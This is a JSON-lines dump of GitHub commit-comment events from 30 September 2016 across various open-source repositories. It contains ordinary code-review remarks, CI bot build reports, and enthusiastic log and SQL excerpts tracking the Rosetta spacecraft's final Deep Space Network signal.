{"id":"4645449406","type":"CommitCommentEvent","actor":{"login":"MessyMix"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19246836,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T19:41:14Z","updated_at":"2016-09-30T19:41:14Z","body":"@endless-sky \r\n>You can't actually view their government name in-game\r\n\r\nActually, you _can_ when you target them. So when I targeted them, I liked how they were under the Kor Mereti faction, because it adds a sense of mysteriousness or severity to the lore. You're in the midst of all these battles between to automata factions, and it's all fun and games until you find the nanobots. Then you get a sense of \"oh! **** just got real!\"\r\n\r\nSo if making the creator's faction ambiguous was an intentional decision, then I guess that's the way things are. But if it's just making a new government for the nanobots, then it would be awesome if they were \"Mereti Nanobots\" or something. Like some experiment gone wayyy to far with such a great potential for discussion."}},"created_at":"2016-09-30T19:41:14Z"}
{"id":"4645452145","type":"CommitCommentEvent","actor":{"login":"henrik9864"},"repo":{"name":"henrik9864/YahurrBot"},"payload":{"comment":{"id":19246841,"position":null,"line":null,"path":null,"commit_id":"8757ad154343deb2d76e6c85e52b475f911a307b","created_at":"2016-09-30T19:41:50Z","updated_at":"2016-09-30T19:41:50Z","body":"Veldig bra magnus."}},"created_at":"2016-09-30T19:41:50Z"}
{"id":"4645454399","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19246849,"position":79,"line":79,"path":"actl_system.py","commit_id":"13fd9fe95606abd7c6649ab6ee6465e407b6e085","created_at":"2016-09-30T19:42:19Z","updated_at":"2016-09-30T19:42:19Z","body":"Better separate:\r\n```python\r\ncmd_method = getattr(system, cmd)\r\ncmd_method(**kwargs)\r\n```"}},"created_at":"2016-09-30T19:42:19Z"}
{"id":"4645459103","type":"CommitCommentEvent","actor":{"login":"Allanramirez1"},"repo":{"name":"google/material-design-lite"},"payload":{"comment":{"id":19246861,"position":null,"line":null,"path":null,"commit_id":"4944037bcd7099521687b6148a85594a57926e0f","created_at":"2016-09-30T19:43:19Z","updated_at":"2016-09-30T19:43:19Z","body":"Sorry, I am n00b on HTML, I had a problem in <?<!DOCTYPE html> it must be <!DOCTYPE html>"}},"created_at":"2016-09-30T19:43:19Z"}
{"id":"4645461435","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19246870,"position":null,"line":null,"path":null,"commit_id":"492b909ae6ed21f709a2b22e2c97c94b89dfc1ff","created_at":"2016-09-30T19:43:49Z","updated_at":"2016-09-30T19:43:49Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#LITMzGRpTOmlTBQfkmFttQ"}},"created_at":"2016-09-30T19:43:49Z"}
{"id":"4645462794","type":"CommitCommentEvent","actor":{"login":"itsmetink"},"repo":{"name":"itsmetink/dayna"},"payload":{"comment":{"id":19246876,"position":1,"line":1,"path":"README.md","commit_id":"1c239822d08c54c40511329fa0085fc9028f8dee","created_at":"2016-09-30T19:44:07Z","updated_at":"2016-09-30T19:44:07Z","body":"+# dayna\r\n@@ -0,0 +1,2 @@\r\n"}},"created_at":"2016-09-30T19:44:07Z"}
{"id":"4645464586","type":"CommitCommentEvent","actor":{"login":"earthgecko"},"repo":{"name":"russss/pydsn"},"payload":{"comment":{"id":19246881,"position":null,"line":null,"path":null,"commit_id":"3e622b5059ea480130d3506c52c777b7d360df87","created_at":"2016-09-30T19:44:28Z","updated_at":"2016-09-30T19:44:28Z","body":"I have 2 dsn_status nodes running I have all tweets since 27 Sept if you want them.  I also have DB records of ROSE's last comms :)\r\n\r\nMaybe Elon is right?  However I posit that the best threat is right here.\r\n\r\n```\r\n[root@zpf-skyline-dev-3-40g-gra1 ~] cat /var/log/pydsn/dsn.log | grep \":: tweet - \" | grep \"2016-09-2[7-9]\\|2016-09-3\"| grep -c tweet\r\n331\r\n[root@zpf-skyline-dev-3-40g-gra1 ~] cat /var/log/pydsn/dsn.log | grep \":: tweet - \" | grep \"2016-09-2[7-9]\\|2016-09-3\"| head\r\n2016-09-27 00:17:13 :: 14618 :: tweet_updates :: tweet - DSS 14 receiving data from @NewHorizons2015 at 3.0kb/s.\r\n2016-09-27 00:26:36 :: 14618 :: tweet_updates :: tweet - DSS 24 carrier lock on @MarsOrbiter\r\n2016-09-27 00:27:56 :: 14618 :: tweet_updates :: tweet - DSS 24 receiving data from @MarsOrbiter at 999b/s.\r\n2016-09-27 00:54:29 :: 14618 :: tweet_updates :: tweet - DSS 26 receiving data from Mars Odyssey at 124.4kb/s.\r\n2016-09-27 01:25:46 :: 14618 :: tweet_updates :: tweet - DSS 65 receiving data from Dawn at 10b/s.\r\n2016-09-27 01:36:53 :: 14618 :: tweet_updates :: tweet - DSS 15 carrier lock on MMS 2\r\n2016-09-27 02:09:36 :: 14618 :: tweet_updates :: tweet - DSS 45 carrier lock on DSCOVR\r\n2016-09-27 02:52:15 :: 14618 :: tweet_updates :: tweet - DSS 54 carrier lock on Lunar Reconnaissance Orbiter\r\n2016-09-27 02:57:18 :: 14618 :: tweet_updates :: tweet - DSS 45 receiving data from DSCOVR at 20.0kb/s.\r\n2016-09-27 03:11:56 :: 14618 :: tweet_updates :: tweet - DSS 15 carrier lock on Chandra\r\n[root@zpf-skyline-dev-3-40g-gra1 ~] cat /var/log/pydsn/dsn.log | grep \":: tweet - \" | grep \"2016-09-2[7-9]\\|2016-09-3\"| tail\r\n2016-09-30 16:56:52 :: 22159 :: tweet_updates :: tweet - US DSS 24 receiving data from ACE at 498b/s.\r\n2016-09-30 17:01:43 :: 22159 :: tweet_updates :: tweet - US DSS 14 carrier lock on @ESA_Rosetta\r\n2016-09-30 17:34:58 :: 22159 :: tweet_updates :: tweet - ES DSS 54 carrier lock on Mars Express\r\n2016-09-30 17:36:19 :: 22159 :: tweet_updates :: tweet - ES DSS 54 receiving data from Mars Express at 262.1kb/s.\r\n2016-09-30 17:57:35 :: 22159 :: tweet_updates :: tweet - ES DSS 63 carrier lock on Voyager 1\r\n2016-09-30 18:01:06 :: 22159 :: tweet_updates :: tweet - ES DSS 63 receiving data from Voyager 1 at 159b/s.\r\n2016-09-30 18:06:59 :: 22159 :: tweet_updates :: tweet - ES DSS 65 carrier lock on MMS 3\r\n2016-09-30 18:38:39 :: 22159 :: tweet_updates :: tweet - ES DSS 55 carrier lock on Mars Reconnaissance Orbiter\r\n2016-09-30 18:40:00 :: 22159 :: tweet_updates :: tweet - ES DSS 55 receiving data from Mars Reconnaissance Orbiter at 3.0Mb/s.\r\n2016-09-30 19:22:04 :: 22159 :: tweet_updates :: tweet - ES DSS 65 carrier lock on MMS 4\r\n[root@zpf-skyline-dev-3-40g-gra1 ~]\r\n```\r\n\r\nI added the ISO country code the other day to help my own neocortex :)  As I tried to detect ROSE's dismiss, but some surf came... Wed aand Thurs was lost to other priorities.\r\n\r\n@russss thank you once again, just for today, all eyes were on DSS 63 and twitter and lots of SQL queries (and Heather @odysseus654)\r\n\r\nWe got it ;)  2 * times on dsn_status_a (prod) and dsn_status_b (dev), which is just db, log and hipchat at the moment, not twitter :)\r\n\r\nWhat a day!  Crazy times ... \r\n\r\n<3s"}},"created_at":"2016-09-30T19:44:28Z"}
{"id":"4645466588","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246885,"position":30,"line":30,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:44:53Z","updated_at":"2016-09-30T19:44:53Z","body":"I'm good with this approach until it's a problem"}},"created_at":"2016-09-30T19:44:53Z"}
{"id":"4645467814","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246886,"position":30,"line":30,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:45:10Z","updated_at":"2016-09-30T19:45:10Z","body":"maybe never 😉 "}},"created_at":"2016-09-30T19:45:10Z"}
{"id":"4645470406","type":"CommitCommentEvent","actor":{"login":"mortezaabbasloo"},"repo":{"name":"yagop/telegram-bot"},"payload":{"comment":{"id":19246895,"position":null,"line":null,"path":null,"commit_id":"7dd15df84b308ff52cfefdd554311885d584be0b","created_at":"2016-09-30T19:45:42Z","updated_at":"2016-09-30T19:45:42Z","body":"Bb"}},"created_at":"2016-09-30T19:45:42Z"}
{"id":"4645470600","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246900,"position":33,"line":33,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:45:44Z","updated_at":"2016-09-30T19:45:44Z","body":"commenting down there..."}},"created_at":"2016-09-30T19:45:44Z"}
{"id":"4645476398","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19246916,"position":null,"line":null,"path":null,"commit_id":"9f3845ec1c62b777bed9b9f46598e7420a805bc4","created_at":"2016-09-30T19:46:58Z","updated_at":"2016-09-30T19:46:58Z","body":"This is for https://github.com/ceylon/ceylon-ide-intellij/issues/517"}},"created_at":"2016-09-30T19:46:58Z"}
{"id":"4645476433","type":"CommitCommentEvent","actor":{"login":"jeremyevans"},"repo":{"name":"jeremyevans/rodauth"},"payload":{"comment":{"id":19246917,"position":null,"line":null,"path":null,"commit_id":"e1c258ea707cddbcb391399ef540ccfd1f85414b","created_at":"2016-09-30T19:46:58Z","updated_at":"2016-09-30T19:46:58Z","body":"@mwpastore No need for that.  All rodauth configuration methods can take a block, which is evaluated in the scope of the rodauth object.  This is part of Rodauth's design, and one reason it is significantly more flexible than other authentication frameworks.  You would just do something like: `jwt_decode_opts{{:aud=>...}}`, where the ... is evaluted in the rodauth scope."}},"created_at":"2016-09-30T19:46:58Z"}
{"id":"4645478262","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19246922,"position":null,"line":null,"path":null,"commit_id":"71600c79bc879a5707092e70609f82d551ba0e4b","created_at":"2016-09-30T19:47:20Z","updated_at":"2016-09-30T19:47:20Z","body":"This is for https://github.com/ceylon/ceylon-ide-intellij/issues/517"}},"created_at":"2016-09-30T19:47:20Z"}
{"id":"4645479667","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19246929,"position":57,"line":42,"path":"task_procs.py","commit_id":"2815a3a0b1eb42c9c8d95ce516d4f3ed2c94975e","created_at":"2016-09-30T19:47:38Z","updated_at":"2016-09-30T19:47:38Z","body":"`...('sec - terminating...')`"}},"created_at":"2016-09-30T19:47:38Z"}
{"id":"4645481425","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246936,"position":36,"line":36,"path":"spec/lib/services/resource_sharer_spec.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:48:01Z","updated_at":"2016-09-30T19:48:01Z","body":"This test is trying to share a template in another tenant (not in my tenant)...\r\n\r\nTODO: We need to validate passed in features are available to the user, namely, if you have don't have the \"vm_start\" feature, you can't pass \"vm_start\" in the list of features for the share."}},"created_at":"2016-09-30T19:48:01Z"}
{"id":"4645486868","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19246953,"position":null,"line":null,"path":null,"commit_id":"b8fe3163051c9f7423aa3fa108eb9063b5e5445d","created_at":"2016-09-30T19:49:12Z","updated_at":"2016-09-30T19:49:12Z","body":"EMSIllumSetPoint (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-30T19:49:12Z"}
{"id":"4645488992","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19246961,"position":5,"line":2570,"path":"src/pocketmine/Server.php","commit_id":"3cd745f18d5eb41c1e637d925e16f090d97c913f","created_at":"2016-09-30T19:49:40Z","updated_at":"2016-09-30T19:49:40Z","body":"This timings are not stopped anywhere"}},"created_at":"2016-09-30T19:49:40Z"}
{"id":"4645490817","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19246965,"position":null,"line":null,"path":null,"commit_id":"b8fe3163051c9f7423aa3fa108eb9063b5e5445d","created_at":"2016-09-30T19:50:05Z","updated_at":"2016-09-30T19:50:05Z","body":"EMSIllumSetPoint (wfbuhl) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-30T19:50:05Z"}
{"id":"4645491726","type":"CommitCommentEvent","actor":{"login":"Altosk"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19246966,"position":null,"line":null,"path":null,"commit_id":"894f59ca27f2169470f30063a720772893d5367e","created_at":"2016-09-30T19:50:16Z","updated_at":"2016-09-30T19:50:16Z","body":"still having problems with several games Arma II, diablo III, battle.net app and beyond good and evil. tested on nouveau but not on radeonsi. Everything worked yesterday."}},"created_at":"2016-09-30T19:50:16Z"}
{"id":"4645492451","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19246971,"position":null,"line":null,"path":null,"commit_id":"34686394a6f1cc1c5c481d90de0f37376a1ff99f","created_at":"2016-09-30T19:50:25Z","updated_at":"2016-09-30T19:50:25Z","body":"I'm disappointed too. :p\r\nhttp://forums.pcsx2.net/attachment.php?aid=61105"}},"created_at":"2016-09-30T19:50:25Z"}
{"id":"4645502438","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246993,"position":47,"line":47,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:52:32Z","updated_at":"2016-09-30T19:52:32Z","body":"TODO: Other than the minor comments, I think for this story, we're good:  https://www.pivotaltracker.com/n/projects/1608513/stories/131005225"}},"created_at":"2016-09-30T19:52:32Z"}
{"id":"4645503697","type":"CommitCommentEvent","actor":{"login":"earthgecko"},"repo":{"name":"russss/pydsn"},"payload":{"comment":{"id":19246995,"position":null,"line":null,"path":null,"commit_id":"3e622b5059ea480130d3506c52c777b7d360df87","created_at":"2016-09-30T19:52:48Z","updated_at":"2016-09-30T19:52:48Z","body":"I may as well share this with possible to only 2 people in the world that may understand this :) @russss and @odysseus654\r\n\r\n```\r\n[root@zpf-skyline-dev-3-40g-gra1 ~] /opt/pydsn/pydsn.rosetta.last.day.sh\r\n20160930195123 :: 20160930 Rosetta's last day - its final comms with DSN\r\nSTART_UTC_TS :: 1475148120\r\nSTART_DSN_TS :: 1475148120000\r\nRosetta on the DSN\r\nSELECT * FROM configSpacecraft WHERE friendlyName='Rosetta'\r\n+----+------+--------------+--------+----------+-------+\r\n| ID | name | friendlyName | lastID | encoding | flags |\r\n+----+------+--------------+--------+----------+-------+\r\n| 29 | rose | Rosetta      |    226 | MCD2     |       |\r\n+----+------+--------------+--------+----------+-------+\r\nThe first event on the DSN for Rosetta's last day?\r\nSELECT ID FROM dataEvent WHERE time > 1475148120000 ORDER BY ID ASC LIMIT 1\r\nID\r\n223880\r\nSELECT * FROM configDish WHERE ID in (SELECT DISTINCT(configDishID) FROM dataDish WHERE eventID > 223880 AND (targetSpacecraft1=29 OR targetSpacecraft2=29 OR targetSpacecraft3=29))\r\nID      configSiteID    name    friendlyName    type\r\n2       1       DSS63   DSS 63  70M\r\n7       2       DSS43   DSS 43  70M\r\n9       3       DSS14   DSS 14  70M\r\n11      3       DSS25   DSS 25  34M\r\n14      0\r\nSELECT * FROM configDish WHERE ID in (SELECT DISTINCT(configDishID) FROM dataDish WHERE eventID > 223880 AND (targetSpacecraft1=29 OR targetSpacecraft2=29 OR targetSpacecraft3=29))\r\nID      configSiteID    name    friendlyName    type\r\n2       1       DSS63   DSS 63  70M\r\n7       2       DSS43   DSS 43  70M\r\n9       3       DSS14   DSS 14  70M\r\n11      3       DSS25   DSS 25  34M\r\n14      0\r\nHow many events did DSN record for Rosetta?\r\nSELECT COUNT(*) FROM dataSignal WHERE eventID BETWEEN 223880 AND 232057 AND configSpacecraftID=29\r\nCOUNT(*)\r\n936\r\nSELECT * FROM dataDish WHERE ID in (SELECT DISTINCT(dataDishID) FROM dataSignal WHERE eventID BETWEEN 223880 AND 232057 AND configSpacecraftID=29)\r\nID      eventID configDishID    createdTime     updatedTime     flags   targetSpacecraft1       targetSpacecraft2       targetSpacecraft3\r\n2521    222375  2       1475132406896   1475132443178           29      NULL    NULL\r\n2555    224954  14      1475159408337   1475159422886           29      NULL    NULL\r\n2556    224956  11      1475159408337   1475159443646           29      NULL    NULL\r\n2557    225330  11      1475159408337   1475163236060           29      NULL    NULL\r\n2590    227312  7       1475184012006   1475184028194           29      NULL    NULL\r\n2592    227313  7       1475184012006   1475184044576           29      NULL    NULL\r\n2645    230636  2       1475218805589   1475218822913           29      NULL    NULL\r\n2646    230638  2       1475218805589   1475218842577           29      NULL    NULL\r\n2647    230925  2       1475218805589   1475221838133           29      NULL    NULL\r\nRosetta - last comms\r\nThu Sep 29 07:00:06 UTC 2016 :: connected to DSS 63\r\nThu Sep 29 14:30:08 UTC 2016 :: connected to DSS 25\r\nThu Sep 29 14:30:08 UTC 2016 :: connected to DSS 25\r\nThu Sep 29 21:20:12 UTC 2016 :: connected to DSS 43\r\nThu Sep 29 21:20:12 UTC 2016 :: connected to DSS 43\r\nFri Sep 30 07:00:05 UTC 2016 :: connected to DSS 63\r\nFri Sep 30 07:00:05 UTC 2016 :: connected to DSS 63\r\nFri Sep 30 07:00:05 UTC 2016 :: connected to DSS 63\r\nSELECT ID FROM dataSignal WHERE configSpacecraftID=29 AND eventID BETWEEN 230925 AND 232056\r\nFri Sep 30 08:00:12 UTC 2016 :: sending DSS 63 data rate 0 b/s\r\nFri Sep 30 08:00:12 UTC 2016 :: sending DSS 63 data rate 0 b/s\r\nFri Sep 30 08:00:27 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:00:27 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:01:17 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:01:17 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:01:07 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:01:07 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:07:07 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:07:07 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:07:17 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:07:17 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:35:27 UTC 2016 :: sending DSS 63 data rate 52426.511719 b/s\r\nFri Sep 30 08:35:27 UTC 2016 :: sending DSS 63 data rate 52426.507812 b/s\r\nFri Sep 30 08:35:47 UTC 2016 :: sending DSS 63 data rate 52426.507812 b/s\r\nFri Sep 30 08:35:47 UTC 2016 :: sending DSS 63 data rate 52426.507812 b/s\r\nFri Sep 30 09:21:37 UTC 2016 :: sending DSS 63 data rate 52426.503906 b/s\r\nFri Sep 30 09:23:12 UTC 2016 :: sending DSS 63 data rate 52426.503906 b/s\r\nFri Sep 30 09:23:12 UTC 2016 :: sending DSS 63 data rate 52426.503906 b/s\r\nFri Sep 30 09:23:22 UTC 2016 :: sending DSS 63 data rate 52426.503906 b/s\r\nFri Sep 30 09:23:22 UTC 2016 :: sending DSS 63 data rate 52426.503906 b/s\r\nRosetta - the last signal\r\nSELECT * FROM dataSignal WHERE ID=82714\r\nID      eventID dataDishID      configDishID    upDown  stateID configSpacecraftID      flags\r\n82714   232056  2647    2       down    10      29\r\nSELECT * FROM configState WHERE ID=10\r\nID      state   upDown  signalType      decoder1        decoder2        encoding        task    flags   valueType\r\n10      IDLE OFF 0 MCD2 down    none    idle    off     MCD2    NULL            idle\r\nFri Sep 30 11:22:24 UTC 2016 :: DSS 63 - IDLE OFF 0 MCD2\r\nFri Sep 30 11:22:24 UTC 2016 :: DSS 63 - carrier lost\r\n[root@zpf-skyline-dev-3-40g-gra1 ~]\r\n```\r\n\r\nWe got it :)"}},"created_at":"2016-09-30T19:52:48Z"}
{"id":"4645504020","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246997,"position":47,"line":47,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:52:52Z","updated_at":"2016-09-30T19:52:52Z","body":"@chrisarcand Maybe throw that story in the commit message"}},"created_at":"2016-09-30T19:52:52Z"}
{"id":"4645507168","type":"CommitCommentEvent","actor":{"login":"riethm"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19247006,"position":26,"line":37,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T19:53:32Z","updated_at":"2016-09-30T19:53:32Z","body":"Depends.  Easiest would be to just call GetBillingItem for each order in turn.  Then it truly doesn't matter whether the items are related or not.  But it's inefficient.\r\n\r\nIf all part of the same order, we can just back-up one level of the tree and fetch the whole order at once.  Then iterate over the items, ignoring those not in the list to check.  \r\n\r\nIf items spanning orders, then we would need to call Account.GetOrders, with an `IN` filter applied.  As with the 'all-in-the-same-order' scenario, would need to ignore items that are not in the list to check (we're getting all items for all orders containing a matching order item).  Would probably want to try out the filter on a higher volume account to ensure it performs."}},"created_at":"2016-09-30T19:53:32Z"}
{"id":"4645508840","type":"CommitCommentEvent","actor":{"login":"nkhalaieff"},"repo":{"name":"nkhalaieff/fin4ds"},"payload":{"comment":{"id":19247011,"position":null,"line":null,"path":null,"commit_id":"1f3b151f35810728478fd03bc1bce8c26efda85d","created_at":"2016-09-30T19:53:56Z","updated_at":"2016-09-30T19:53:56Z","body":"Edited Code"}},"created_at":"2016-09-30T19:53:56Z"}
{"id":"4645511826","type":"CommitCommentEvent","actor":{"login":"chrisarcand"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19247017,"position":36,"line":36,"path":"spec/lib/services/resource_sharer_spec.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:54:34Z","updated_at":"2016-09-30T19:54:34Z","body":"> This test is trying to share a template in another tenant (not in my tenant)...\r\n\r\nThis one is for sharing something that you can't see in RBAC. I assumed that not seeing it in RBAC would cover the 'actually the resource is in another tenant' cause....maybe not..."}},"created_at":"2016-09-30T19:54:34Z"}
{"id":"4645513094","type":"CommitCommentEvent","actor":{"login":"earthgecko"},"repo":{"name":"odysseus654/pydsn"},"payload":{"comment":{"id":19247019,"position":null,"line":null,"path":null,"commit_id":"f72d3fa8a5f28cd3926d75ba081465d89c4136b4","created_at":"2016-09-30T19:54:50Z","updated_at":"2016-09-30T19:54:50Z","body":"@odysseus654 we got it!  Rosetta's last signal on DSN see - https://github.com/russss/pydsn/commit/3e622b5059ea480130d3506c52c777b7d360df87 \\o/ THANK you!!!"}},"created_at":"2016-09-30T19:54:50Z"}
{"id":"4645515030","type":"CommitCommentEvent","actor":{"login":"Kai-Chen"},"repo":{"name":"TresAmigosSD/SMV"},"payload":{"comment":{"id":19247023,"position":null,"line":null,"path":null,"commit_id":"f38052866a74ec480bb496f6b9b1e54e08d2c25e","created_at":"2016-09-30T19:55:15Z","updated_at":"2016-09-30T19:55:15Z","body":"You can do an `orderBy` before comparing the data frames."}},"created_at":"2016-09-30T19:55:15Z"}
{"id":"4645515416","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-storage"},"payload":{"comment":{"id":19247024,"position":9,"line":117,"path":"src/storage.ts","commit_id":"b45e23d74e73745021da20ff81299892f3c7f8af","created_at":"2016-09-30T19:55:20Z","updated_at":"2016-09-30T19:55:20Z","body":"Why the if? Localforage accepts arbitrary engines (for example, the SQLite driver)"}},"created_at":"2016-09-30T19:55:20Z"}
{"id":"4645515728","type":"CommitCommentEvent","actor":{"login":"Prakhiltp"},"repo":{"name":"SNGIST-vega/Treehouse"},"payload":{"comment":{"id":19247027,"position":13,"line":38,"path":"controllers/usercontroller.js","commit_id":"dbf2ad3c4a65ca15e125b20170598e059d694d52","created_at":"2016-09-30T19:55:25Z","updated_at":"2016-09-30T19:55:25Z","body":"user data will be entered to student/lecturer collection while its entering to the user collection."}},"created_at":"2016-09-30T19:55:25Z"}
{"id":"4645518874","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalcon/docs"},"payload":{"comment":{"id":19247032,"position":null,"line":null,"path":null,"commit_id":"a8524a934a8f4464a161373fd32d580e689ad170","created_at":"2016-09-30T19:56:02Z","updated_at":"2016-09-30T19:56:02Z","body":"👍 "}},"created_at":"2016-09-30T19:56:02Z"}
{"id":"4645522814","type":"CommitCommentEvent","actor":{"login":"ZinovievVladimir"},"repo":{"name":"ZinovievVladimir/dzStringClass"},"payload":{"comment":{"id":19247042,"position":null,"line":null,"path":null,"commit_id":"31bc4ea39fc22d10ebacc6d8fca49cb396e0404a","created_at":"2016-09-30T19:56:50Z","updated_at":"2016-09-30T19:56:50Z","body":"@alexey-sidnev Д/З по классам."}},"created_at":"2016-09-30T19:56:50Z"}
{"id":"4645523973","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19247046,"position":null,"line":null,"path":null,"commit_id":"29dc22241f086a81bac2d2f9b6b27d67539bda90","created_at":"2016-09-30T19:57:05Z","updated_at":"2016-09-30T19:57:05Z","body":"ei.attackedBy[Us][ALL_PIECES] is a bit tricky to use at that point of the code, \r\nbecause it is under construction.\r\n\r\nFor the first knight in the piece list for that color, it will look for attacks by king and pawns\r\nFor the second knight in the list, it will look for attacks by king and pawns and the first knight\r\nFor bishops, it will look for attacks by king and pawns and knights.\r\n\r\nIt might be OK like this, but for sure you should give a try to simply using ei.attackedBy[Us][PAWN].\r\n\r\nHowever if your idea is to use a completely formed ei.attackedBy[Us][ALL_PIECES],\r\nyou should rewrite this MinorBehindPawn and put it somewhere else, for example, in evaluate_threats.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-30T19:57:05Z"}
{"id":"4645526896","type":"CommitCommentEvent","actor":{"login":"aman0044"},"repo":{"name":"kangax/fabric.js"},"payload":{"comment":{"id":19247051,"position":null,"line":null,"path":null,"commit_id":"35d5cf220f1e803526b4c111295b76eaf154c3ab","created_at":"2016-09-30T19:57:43Z","updated_at":"2016-09-30T19:57:43Z","body":"Hey buddy can you please help me to implement this thing ,actually i am also stuck on the same thing and finds it difficult to understand what you were explaining."}},"created_at":"2016-09-30T19:57:43Z"}
{"id":"4645531664","type":"CommitCommentEvent","actor":{"login":"samhed"},"repo":{"name":"kanaka/noVNC"},"payload":{"comment":{"id":19247064,"position":null,"line":null,"path":null,"commit_id":"86c67404c9c3087f521c3ad1cadb9a1514dc556a","created_at":"2016-09-30T19:58:46Z","updated_at":"2016-09-30T19:58:46Z","body":"This caused the clipboard textarea to always start by containing a number of spaces FYI"}},"created_at":"2016-09-30T19:58:46Z"}
{"id":"4645537234","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247076,"position":396,"line":396,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T19:59:57Z","updated_at":"2016-09-30T19:59:57Z","body":"Remove this line"}},"created_at":"2016-09-30T19:59:57Z"}
